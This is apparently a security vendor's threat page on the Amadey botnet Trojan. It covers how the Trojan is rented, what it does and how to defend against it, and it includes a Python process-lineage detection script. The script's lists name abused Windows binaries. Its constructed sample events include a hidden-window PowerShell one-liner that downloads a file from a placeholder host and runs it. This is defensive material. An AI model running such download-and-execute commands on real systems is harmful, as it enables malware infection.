
Amadey

Posted: August 5, 2019

Amadey is a botnet Trojan that grants attackers access to the infected PC's files and system settings and is used primarily to deliver other threats. Its presence can facilitate the dropping of banking Trojans and similar spyware, while it also carries data-exfiltrating features of its own. Because its symptoms are limited, users should protect their PCs by keeping anti-malware products active so that Amadey is removed automatically.

When Threat Actors Sell Their Goods to the Wrong Customer

Information on the Amadey botnet and its threat-loading mechanisms has been available for months, but the means of acquiring this intelligence was unorthodox. Members of the cyber-security community paid the upfront fee for 'hiring' Amadey's zombie-network services and, in the process, gained in-depth access to the samples' code and control panel. As a result, Amadey is one of the more thoroughly explored Trojan downloaders on the black market.

Third-party threat actors can rent the Russian Amadey Trojan's capabilities for around 600 USD and run campaigns for it via an easy-to-use admin panel. While the quality of its code is debatable, Amadey does include significant obfuscation for hiding itself from detection. It also checks for the presence of major AV vendors' products and reports what it finds to its command-and-control (C&C) server.

Amadey ships with a built-in UAC bypass (note that Microsoft does not treat UAC as a security boundary, so a bypass does not imply a patchable vulnerability) and can conduct attacks such as downloading other files, loading DLLs or executables, and collecting system information. Malware experts note that its primary use is delivering other Trojans with more specific attack features onto the PC, such as SystemBC, a proxy used to obscure C&C traffic, or the Danabot banking Trojan. Other payloads are both possible and likely, since the Trojan operates on a mercenary basis.

Making Sure that Russian Hirelings Sell Themselves Short

Although Amadey presents itself as a downloader, victims should treat it as equivalent to a backdoor Trojan in terms of security risk. Through it, a threat actor may copy and collect files, abuse harvested system details for other attacks, and circumvent various Windows security controls. Although its code, encryption and obfuscation aside, isn't high-quality or advanced, the Trojan operates as an effective means of escalating an initial security breach into more specialized and invasive incidents.

Some Amadey infections use e-mail and malicious Office documents to compromise victims, although any for-hire threat can be distributed through numerous strategies. Scanning e-mail attachments, disabling browser scripts and document macros, updating software, and using strong passwords are appropriate preemptive defenses. Like most botnets, Amadey runs without leaving readily visible symptoms, and malware experts recommend against attempting manual detection or removal for most users.
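The delivery chain described in the two paragraphs above (a malicious Office document spawning a script host, which drops a loader into a user-writable directory, which in turn loads further DLLs or executables) lends itself to a process-lineage detection. The following is an added example, not Amadey's code and not a detection published by this page's vendor; it assumes Sysmon-style process-creation events with Image, ParentImage and CommandLine fields, and the sample events are constructed rather than captured from a real infection:

```python
"""Heuristic detection for a document-to-loader delivery chain.

Added example (not Amadey's code, not the vendor's detection). Walks
Sysmon-style process-creation events (Event ID 1 field names: Image,
ParentImage, CommandLine). The SAMPLE_EVENTS below are constructed.
Tune the lists to your environment: printing and browser helpers spawned
by Office are a common source of false positives.
"""
from dataclasses import dataclass
import ntpath

# Office applications commonly abused as the initial access vector.
OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}

# Script hosts, shells and living-off-the-land binaries a macro typically
# spawns to fetch and run a loader, or that a loader uses to run a DLL.
SUSPICIOUS_CHILDREN = {
    "cmd.exe", "powershell.exe", "wscript.exe", "cscript.exe", "mshta.exe",
    "rundll32.exe", "regsvr32.exe", "certutil.exe", "bitsadmin.exe",
}
DLL_LOADERS = {"rundll32.exe", "regsvr32.exe"}

# User-writable locations where dropped loaders and fetched payloads land
# (assumed list; plain strings so the trailing backslash is allowed).
STAGING_DIRS = (
    "\\appdata\\local\\temp\\",
    "\\appdata\\roaming\\",
    "\\downloads\\",
    "\\programdata\\",
)


@dataclass(frozen=True)
class Finding:
    rule: str
    image: str
    parent_image: str
    command_line: str


def _name(path: str) -> str:
    """Lower-cased file name of a Windows path; works on any host OS."""
    return ntpath.basename(path).lower()


def _in_staging_dir(text: str) -> bool:
    lowered = text.lower()
    return any(d in lowered for d in STAGING_DIRS)


def check_event(event: dict) -> list:
    """Return the findings (possibly none) for one process-creation event."""
    image = event.get("Image", "")
    parent = event.get("ParentImage", "")
    cmd = event.get("CommandLine", "")
    findings = []
    # Rule 1: an Office app spawning a shell, script host or LOLBin.
    if _name(parent) in OFFICE_APPS and _name(image) in SUSPICIOUS_CHILDREN:
        findings.append(Finding("office_spawns_child", image, parent, cmd))
    # Rule 2: any executable started from a user-writable staging directory.
    if _in_staging_dir(image):
        findings.append(Finding("exec_from_staging_dir", image, parent, cmd))
    # Rule 3: rundll32/regsvr32 loading a DLL out of a staging directory.
    if _name(image) in DLL_LOADERS and _in_staging_dir(cmd):
        findings.append(Finding("dll_load_from_staging_dir", image, parent, cmd))
    return findings


def scan(events) -> list:
    """Run check_event over an iterable of events and flatten the findings."""
    return [f for e in events for f in check_event(e)]


# Constructed sample events (not real telemetry): a three-step chain that
# should fire once per step, followed by two benign events that must not.
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "CommandLine": r'powershell.exe -w hidden -c "iwr http://example.invalid/a -OutFile $env:TEMP\up.exe; Start-Process $env:TEMP\up.exe"'},
    {"Image": r"C:\Users\alice\AppData\Local\Temp\up.exe",
     "ParentImage": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r"C:\Users\alice\AppData\Local\Temp\up.exe"},
    {"Image": r"C:\Windows\System32\rundll32.exe",
     "ParentImage": r"C:\Users\alice\AppData\Local\Temp\up.exe",
     "CommandLine": r"rundll32.exe C:\Users\alice\AppData\Roaming\svc.dll,Start"},
    {"Image": r"C:\Windows\System32\svchost.exe",
     "ParentImage": r"C:\Windows\System32\services.exe",
     "CommandLine": r"C:\Windows\System32\svchost.exe -k netsvcs"},
    {"Image": r"C:\Windows\splwow64.exe",
     "ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "CommandLine": r"C:\Windows\splwow64.exe 12288"},
]


if __name__ == "__main__":
    for f in scan(SAMPLE_EVENTS):
        print(f"[{f.rule}] {f.parent_image} -> {f.image}")
```

Each rule on its own is noisy; the value is in correlating them along the parent-child chain (the loader flagged by rule 2 is the parent of the rundll32 flagged by rule 3), so in a real pipeline key the findings by ProcessGuid/ParentProcessGuid and alert when two or more steps of the chain appear on one host within a short window.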

For disinfection, update your anti-malware solution before removing Amadey; recent updates may include detections for its newer obfuscation and evasion techniques.

For the price it commands, Amadey doesn't have a very high reputation on the Dark Web. Its spotty reception may not matter much, however: there is a steady supply of sufficiently desperate criminals using one-star Trojans for attacks that deal four stars' worth of damage.
